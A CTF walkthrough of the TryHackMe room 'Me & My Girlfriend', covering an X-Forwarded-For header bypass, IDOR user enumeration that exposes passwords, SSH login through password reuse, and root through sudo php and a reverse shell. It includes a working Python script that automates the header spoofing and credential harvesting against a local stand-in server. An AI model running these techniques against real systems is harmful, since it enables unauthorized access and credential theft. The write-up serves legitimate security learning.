CTF Walkthrough | TryHackMe | Me & My Girlfriend
Have you ever wondered how an IDOR vulnerability can lead to root access on a remote machine through SSH? Log in to TryHackMe and go to rooms → meandmygirlfriend to follow along.
Reconnaissance:
Initially I used nmap to scan the ports for information gathering and found ports 80 and 22 open.
When I browsed to port 80, I found a message that was quite unusual for a landing page.
Adding Headers:
After viewing the page source, I saw a message hinting that the site checks the request header x-forwarded-for.
Using a request header to reach a hidden site was a new concept to me. It took me a while to understand, since at first I was not able to open the site hidden behind this header.
I captured the request with Burp Suite, sent it to Repeater and added the header to the request.
First I edited a single request and studied the response. With the header in place I was redirected to the hidden website.
After that first request, the redirect produced a new request without the header. So I either had to add the same header to every request by hand, which is tedious, or find a way to add it automatically.
I went to the Proxy settings and added a match and replace rule for request headers. This added the header x-forwarded-for: localhost to every request automatically.
Once the header was on every request, I was able to browse the website. The check trusts a client-supplied header as the client's address, so "local only" is no restriction at all; anyone who can edit their own requests can pass it.
Gaining Access (IDOR):
I registered a new user and then logged in with the same credentials.
Looking at the URL, the query string carries a user id, which suggested an IDOR (insecure direct object reference) vulnerability: the page uses the id to decide whose data to show, without checking that the logged-in user is authorized to see it.
I kept changing the user id parameter and found multiple users on the website. Here I found one user with user id 9.
I was able to recover the password as well, since the profile page returns it.
For user id 5 I found the user Alice with the password 4lic3.
Through the IDOR vulnerability I found 6 users with different user ids. The most interesting one is Alice.
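The two steps above (reaching the site behind the x-forwarded-for check, then walking the user id parameter) as one added example. This is my own illustration, not code from the original post or from the room: it stands up a small constructed stand-in for the web app on localhost that refuses requests without "X-Forwarded-For: localhost" and serves a profile page keyed only on the query parameter, then enumerates ids the way the walkthrough did. The path /dashboard.php, the parameter name user_id, the HTML layout and every user except alice/4lic3 are assumptions; only alice's credentials come from the walkthrough.

```python
import re
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Constructed user table: only id 5 (alice / 4lic3) is from the walkthrough,
# the other rows are made up for the demo.
USERS = {
    1: ("admin", "changeme1"),
    5: ("alice", "4lic3"),
    9: ("bob", "hunter2"),
}


class HiddenSite(BaseHTTPRequestHandler):
    """Stand-in for the room's app (assumed behaviour, not the real code)."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def _send(self, code, html):
        body = html.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        # The "local only" check: it trusts a header the client controls.
        if self.headers.get("X-Forwarded-For") != "localhost":
            self._send(403, "<p>This site can only be accessed locally.</p>")
            return
        url = urlparse(self.path)
        query = parse_qs(url.query)
        if url.path == "/dashboard.php" and "user_id" in query:
            try:
                uid = int(query["user_id"][0])
            except ValueError:
                self._send(400, "<p>bad id</p>")
                return
            user = USERS.get(uid)
            if user is None:
                self._send(404, "<p>no such user</p>")
                return
            # The IDOR: the profile is chosen by user_id alone, with no check
            # that the caller is that user, and the password is echoed back.
            name, password = user
            self._send(200, '<input name="username" value="%s">'
                            '<input name="password" value="%s">' % (name, password))
            return
        self._send(200, "<p>Welcome to the hidden site</p>")


# Bypass any http_proxy in the environment so the demo stays on localhost.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def fetch(base, path, forwarded_for=None, timeout=3):
    """GET base+path, optionally with X-Forwarded-For; return (status, body)."""
    req = urllib.request.Request(base + path)
    if forwarded_for is not None:
        req.add_header("X-Forwarded-For", forwarded_for)
    try:
        with OPENER.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


CRED_RE = re.compile(r'name="username" value="([^"]*)".*?'
                     r'name="password" value="([^"]*)"', re.S)


def enumerate_user_ids(base, ids, forwarded_for="localhost"):
    """Walk user_id values with the bypass header on every request and
    return {id: (username, password)} for the ids that resolve."""
    found = {}
    for uid in ids:
        status, body = fetch(base, "/dashboard.php?user_id=%d" % uid, forwarded_for)
        if status != 200:
            continue
        match = CRED_RE.search(body)
        if match:
            found[uid] = (match.group(1), match.group(2))
    return found


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), HiddenSite)  # port 0 = any free port
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


def demo():
    """Returns (status without header, status with header, enumerated creds)."""
    srv, base = start_server()
    try:
        blocked = fetch(base, "/")[0]
        allowed = fetch(base, "/", forwarded_for="localhost")[0]
        creds = enumerate_user_ids(base, range(1, 11))
    finally:
        srv.shutdown()
        srv.server_close()
    return blocked, allowed, creds


if __name__ == "__main__":
    blocked, allowed, creds = demo()
    print("without header:", blocked, "with header:", allowed)
    for uid, (name, password) in sorted(creds.items()):
        print("user_id=%d  %s : %s" % (uid, name, password))
```

Against the real room the same client code would run with base set to the target's http URL; the header is added by fetch on every request, which is exactly what the Burp match and replace rule did in the browser. Ids that return 404 are simply skipped, so the gaps between valid ids do not stop the enumeration.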
I remembered that port 22 was open and saw this as an opportunity to log in to the machine with the same password I found on the website, betting on password reuse between the web app and the system account.
I used the ssh command to log in as alice.
I enumerated alice's home directory and found the first flag in the my_secret directory.
Privilege Escalation:
After finding the first flag, I went looking for the root flag, starting with the sudo -l command to see what alice is allowed to run as root.
It showed that /usr/bin/php could be run through sudo, and GTFOBins lists a reverse shell for php.
I edited the reverse shell command to use my Kali machine's IP address and port 1234 for the netcat listener.
I ran the command from the alice account over SSH.
The reverse shell connected back to the netcat listener as root, and I found the flag in the /root directory. Any binary that can execute arbitrary code under sudo gives root directly; the reverse shell is just a convenient way to use it.
See you guys in the next one. Peace ✌🏽